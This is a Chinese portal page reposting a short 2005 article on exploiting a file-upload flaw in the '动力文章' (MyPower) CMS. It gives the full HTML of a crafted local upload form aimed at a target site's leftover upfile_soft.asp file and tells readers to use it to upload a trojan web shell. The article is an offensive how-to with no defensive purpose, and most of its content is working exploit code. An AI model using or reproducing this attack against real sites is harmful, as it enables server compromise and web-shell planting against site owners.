如果你觉得本站还不错,为方便下次访问,可以【加入收藏】 最快知道本站更新,请订阅切换到繁體中文
百姓生活网
首页 | 时尚女性 | 家有爱车 | 妈妈宝贝 | 美食厨房 | 亲亲大自然 | 爱上摄影 | 电脑学堂 | 我爱我家 | 健康人生 | 小小书房 | 壁纸下载 | 影视评论 | 学英语 | 商业
养殖 | 种殖 | 产业信息
子 栏 目 导 航: 电脑学堂硬件资讯 软件资讯 网页设计 实战地带 互联八卦 游戏世界
您现在的位置: 百姓生活网 >> 点点滴滴 >> 电脑学堂 >> 软件资讯 >> 信息安全 >> 正文
动力文章上传漏洞的本地利用

作者:佚名    文章来源:本站原创    点击数:    更新时间:2005-10-13
动力文章上传漏洞的本地利用

最近盛行动力文章上传漏洞,不少网站纷纷关闭了上传功能,但一些网站并没有删除上传文件:upfile_soft.asp

这就给本地利用创造了机会,我们可以在本地构造一个上传页面,将上传地址直接指向网站的upfile_soft.asp文件。

构造的本地upfile.htm源程序如下:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
BODY{
BACKGROUND-COLOR: #E1F4EE;
font-size:9pt
}
.tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}
-->
</style>

</head>
<body leftmargin="0" topmargin="0">
<form action=" http://www.xxx.com/upfile_soft.asp " method="post" name="form1" enctype="multipart/form-data">
<input name="FileName" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
</form>
</body>
</html>

修改代码中相应的页面地址我们就可以重新进行上传抓包,继而上传我们的马儿!

发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
  • 上一篇文章:

  • 下一篇文章:
  • 赞助商链接: | 阅读过这篇文章的网友,同时还还阅读了以下几篇文章:
    ldb文件 是什么?
    动力系统打印页面SQL注入漏洞
    留言本谢绝SPAM,防址垃圾留
    动力文章系统漏洞的检测
    动易网络发布的漏洞补丁公告
    动力3.51存在严重的文件上传漏洞
    动力(My Power)系统SQL注射漏洞
    MY动力系统3.51常见问题解答汇集(2)
    MY动力系统3.51常见问题解答汇集(1)
    原版动力3.51整合动网7.0SP2详细安装说明!

    本栏目最近更新的图片文章:
    Google

    学习强大的Regsvr32命令

    在一台服务器上实现多个We
    网友评论:(只显示最新10条。评论内容只代表网友观点,请注意礼貌用语,与本站立场无关!)

    ©2005 百姓生活网 www.y8u8.com 琼ICP备13000608号 网站地图